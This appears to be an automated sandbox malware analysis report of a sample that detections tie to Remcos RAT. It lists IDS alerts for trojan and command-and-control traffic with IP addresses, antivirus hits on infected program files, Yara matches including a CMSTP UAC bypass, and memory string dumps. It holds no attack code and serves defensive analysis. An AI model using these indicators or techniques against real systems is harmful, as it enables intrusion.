              2024-10-08T15:29:27.146473+020020516511A Network Trojan was detected192.168.2.4601551.1.1.153UDP
              2024-10-08T15:29:39.730141+020020516511A Network Trojan was detected192.168.2.4556841.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T15:29:44.367043+020020516531A Network Trojan was detected192.168.2.4581041.1.1.153UDP
              2024-10-08T15:30:05.415429+020020516531A Network Trojan was detected192.168.2.4590491.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T15:30:02.236163+020020516501A Network Trojan was detected192.168.2.4492651.1.1.153UDP
              2024-10-08T15:30:02.257670+020020516501A Network Trojan was detected192.168.2.4492651.1.1.153UDP
              2024-10-08T15:30:19.712219+020020516501A Network Trojan was detected192.168.2.4530601.1.1.153UDP
              2024-10-08T15:30:19.739111+020020516501A Network Trojan was detected192.168.2.4530601.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T15:30:19.935528+020020516521A Network Trojan was detected192.168.2.4625801.1.1.153UDP
              2024-10-08T15:30:19.957787+020020516521A Network Trojan was detected192.168.2.4625801.1.1.153UDP
              2024-10-08T15:30:20.973754+020020516521A Network Trojan was detected192.168.2.4625801.1.1.153UDP
              2024-10-08T15:30:44.526136+020020516521A Network Trojan was detected192.168.2.4492621.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T15:28:02.566420+020020516491A Network Trojan was detected192.168.2.4492491.1.1.153UDP
              2024-10-08T15:28:06.066011+020020516491A Network Trojan was detected192.168.2.4575331.1.1.153UDP
              2024-10-08T15:30:38.939328+020020516491A Network Trojan was detected192.168.2.4585291.1.1.153UDP
              2024-10-08T15:31:01.420227+020020516491A Network Trojan was detected192.168.2.4537611.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T15:28:01.462034+020020516481A Network Trojan was detected192.168.2.4635801.1.1.153UDP
              2024-10-08T15:28:04.661509+020020516481A Network Trojan was detected192.168.2.4508531.1.1.153UDP
              2024-10-08T15:30:37.890251+020020516481A Network Trojan was detected192.168.2.4611941.1.1.153UDP
              2024-10-08T15:31:00.404573+020020516481A Network Trojan was detected192.168.2.4560681.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T15:28:00.917887+020020181411A Network Trojan was detected54.244.188.17780192.168.2.449735TCP
              2024-10-08T15:28:01.591126+020020181411A Network Trojan was detected18.141.10.10780192.168.2.449736TCP
              2024-10-08T15:28:04.583945+020020181411A Network Trojan was detected44.221.84.10580192.168.2.449745TCP
              2024-10-08T15:28:39.943894+020020181411A Network Trojan was detected13.251.16.15080192.168.2.449789TCP
              2024-10-08T15:28:40.146546+020020181411A Network Trojan was detected47.129.31.21280192.168.2.449790TCP
              2024-10-08T15:28:44.385830+020020181411A Network Trojan was detected34.246.200.16080192.168.2.449828TCP
              2024-10-08T15:28:44.960418+020020181411A Network Trojan was detected18.208.156.24880192.168.2.449835TCP
              2024-10-08T15:28:50.660540+020020181411A Network Trojan was detected35.164.78.20080192.168.2.449872TCP
              2024-10-08T15:28:51.300193+020020181411A Network Trojan was detected3.94.10.3480192.168.2.449883TCP
              2024-10-08T15:29:00.825835+020020181411A Network Trojan was detected34.211.97.4580192.168.2.449963TCP
              2024-10-08T15:29:00.949795+020020181411A Network Trojan was detected44.213.104.8680192.168.2.449966TCP
              2024-10-08T15:29:20.912788+020020181411A Network Trojan was detected3.254.94.18580192.168.2.450123TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T15:28:00.917887+020020377711A Network Trojan was detected54.244.188.17780192.168.2.449735TCP
              2024-10-08T15:28:01.591126+020020377711A Network Trojan was detected18.141.10.10780192.168.2.449736TCP
              2024-10-08T15:28:04.583945+020020377711A Network Trojan was detected44.221.84.10580192.168.2.449745TCP
              2024-10-08T15:28:39.943894+020020377711A Network Trojan was detected13.251.16.15080192.168.2.449789TCP
              2024-10-08T15:28:40.146546+020020377711A Network Trojan was detected47.129.31.21280192.168.2.449790TCP
              2024-10-08T15:28:44.385830+020020377711A Network Trojan was detected34.246.200.16080192.168.2.449828TCP
              2024-10-08T15:28:44.960418+020020377711A Network Trojan was detected18.208.156.24880192.168.2.449835TCP
              2024-10-08T15:28:50.660540+020020377711A Network Trojan was detected35.164.78.20080192.168.2.449872TCP
              2024-10-08T15:28:51.300193+020020377711A Network Trojan was detected3.94.10.3480192.168.2.449883TCP
              2024-10-08T15:29:00.825835+020020377711A Network Trojan was detected34.211.97.4580192.168.2.449963TCP
              2024-10-08T15:29:00.949795+020020377711A Network Trojan was detected44.213.104.8680192.168.2.449966TCP
              2024-10-08T15:29:20.912788+020020377711A Network Trojan was detected3.254.94.18580192.168.2.450123TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T15:28:02.007408+020028508511Malware Command and Control Activity Detected192.168.2.449739172.234.222.14380TCP
              2024-10-08T15:29:04.863924+020028508511Malware Command and Control Activity Detected192.168.2.44999818.208.156.24880TCP
              2024-10-08T15:30:05.317102+020028508511Malware Command and Control Activity Detected192.168.2.45023518.208.156.24880TCP
              2024-10-08T15:31:10.411079+020028508511Malware Command and Control Activity Detected192.168.2.45653982.112.184.19780TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for dropped file
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
              Multi AV Scanner detection for submitted file
              Source: tyRPPK48Mk.exeReversingLabs: Detection: 73%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.1959006729.0000000000822000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 4420, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 2084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 6908, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
              Machine Learning detection for dropped file
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: tyRPPK48Mk.exeJoe Sandbox ML: detected
              Source: name.exe, 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_fb5aa34f-1

              Exploits

              barindex
              Yara detected UAC Bypass using CMSTP
              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 4420, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 2084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 6908, type: MEMORYSTR
              Source: tyRPPK48Mk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: svchost.exe, 00000006.00000003.2475292212.0000000004C30000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: svchost.exe, 00000006.00000003.2571026895.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2552676258.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2555692425.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdb source: svchost.exe, 00000006.00000003.1940200063.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000006.00000003.1848418445.0000000005560000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: svchost.exe, 00000006.00000003.2166044684.0000000004C90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ssh-agent.pdb source: svchost.exe, 00000006.00000003.2024944125.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: svchost.exe, 00000006.00000003.2309255812.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: svchost.exe, 00000006.00000003.2113410162.0000000003083000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: svchost.exe, 00000006.00000003.2309255812.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdbGCTL source: svchost.exe, 00000006.00000003.1940200063.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdb source: svchost.exe, 00000006.00000003.2329602484.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdbGCTL source: svchost.exe, 00000006.00000003.2631630815.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2637810667.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdb source: svchost.exe, 00000006.00000003.1892510705.0000000005750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3178209395.0000000001470000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdb source: svchost.exe, 00000006.00000003.1951393165.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: name.exe, 00000001.00000003.1802681812.0000000005030000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000001.00000003.1802504246.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000003.00000003.1821978946.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000003.00000003.1818359606.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.1837727518.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.1840416756.0000000005860000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: svchost.exe, 00000006.00000003.2278103872.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdbGCTL source: svchost.exe, 00000006.00000003.1990664261.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdb source: svchost.exe, 00000006.00000003.1990664261.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: svchost.exe, 00000006.00000003.2608906582.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: svchost.exe, 00000006.00000003.2482581363.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2496506784.0000000004B80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WmiApSrv.pdbGCTL source: svchost.exe, 00000006.00000003.2075539957.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: svchost.exe, 00000006.00000003.2362639087.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Acrobat_SL.pdb((( source: svchost.exe, 00000006.00000003.2178027420.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdb source: svchost.exe, 00000006.00000003.1987958380.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1978746407.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: svchost.exe, 00000006.00000003.1876194254.00000000056D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdbCC9 source: svchost.exe, 00000006.00000003.2329602484.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: svchost.exe, 00000006.00000003.2193636183.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Acrobat_SL.pdb source: svchost.exe, 00000006.00000003.2178027420.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: svchost.exe, 00000006.00000003.2571026895.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2552676258.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2555692425.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: svchost.exe, 00000006.00000003.2278103872.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: svchost.exe, 00000006.00000003.2385840703.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: svchost.exe, 00000006.00000003.2166044684.0000000004C90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdb source: svchost.exe, 00000006.00000003.2631630815.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2637810667.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb source: svchost.exe, 00000006.00000003.1919148439.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdbGCTL source: svchost.exe, 00000006.00000003.1951393165.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msdtcexe.pdbGCTL source: svchost.exe, 00000006.00000003.1931405560.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: 64BitMAPIBroker.pdb source: svchost.exe, 00000006.00000003.2453584126.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: snmptrap.pdbGCTL source: svchost.exe, 00000006.00000003.2004063369.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerfHost.pdbGCTL source: svchost.exe, 00000006.00000003.1964254852.0000000005720000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1975873172.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1966295550.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: svchost.exe, 00000006.00000003.2608906582.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: svchost.exe, 00000006.00000003.2432675812.0000000004C30000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: svchost.exe, 00000006.00000003.2362639087.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: svchost.exe, 00000006.00000003.2475292212.0000000004C30000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerfHost.pdb source: svchost.exe, 00000006.00000003.1964254852.0000000005720000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1975873172.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1966295550.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: svchost.exe, 00000006.00000003.2385840703.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: svchost.exe, 00000006.00000003.2438532554.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb` source: svchost.exe, 00000006.00000003.1919148439.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: svchost.exe, 00000006.00000003.2482581363.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2496506784.0000000004B80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: name.exe, 00000001.00000003.1802681812.0000000005030000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000001.00000003.1802504246.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000003.00000003.1821978946.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000003.00000003.1818359606.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.1837727518.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.1840416756.0000000005860000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdb source: svchost.exe, 00000006.00000003.2032642838.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdbGCTL source: svchost.exe, 00000006.00000003.2032642838.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WmiApSrv.pdb source: svchost.exe, 00000006.00000003.2075539957.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: svchost.exe, 00000006.00000003.2393262607.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ntkrnlmp.pdbce_T151c2VyQ29udGV4dElkPTUsYSw=p source: svchost.exe, 00000006.00000003.2113410162.0000000003083000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ALG.pdb source: svchost.exe, 00000006.00000003.1854023776.0000000005890000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msdtcexe.pdb source: svchost.exe, 00000006.00000003.1931405560.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: svchost.exe, 00000006.00000003.1876194254.00000000056D0000.00000004.00001000.00020000.00000000.sdmp
